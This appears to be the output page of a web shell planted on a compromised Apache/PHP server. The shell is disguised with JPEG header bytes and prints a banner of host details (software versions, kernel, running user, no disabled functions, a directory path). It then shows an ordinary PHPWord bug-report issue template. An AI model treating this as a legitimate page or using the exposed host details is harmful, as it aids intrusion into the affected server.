���� JFIF �� � ( %"1"%)+...383,7(-.-
![]() Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20 System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 User : apache ( 48) PHP Version : 7.4.20 Disable Function : NONE Directory : /var/www/html/admin.adimi/vendor/phpoffice/phpword/.github/ISSUE_TEMPLATE/ |
--- name: Bug report about: Create a report to help improve PHPWord labels: Bug Report --- ### Describe the Bug A clear and concise description of what the bug is. ### Steps to Reproduce Please provide a code sample that reproduces the issue. ```php <?php require __DIR__ . '/vendor/autoload.php'; $phpWord = new \PhpOffice\PhpWord\PhpWord(); $section = $phpWord->addSection(); $section->... ``` ### Expected Behavior A clear and concise description of what you expected to happen. ### Current Behavior What is the current behavior? ### Context Please fill in your environment information: - PHP Version: - PHPWord Version: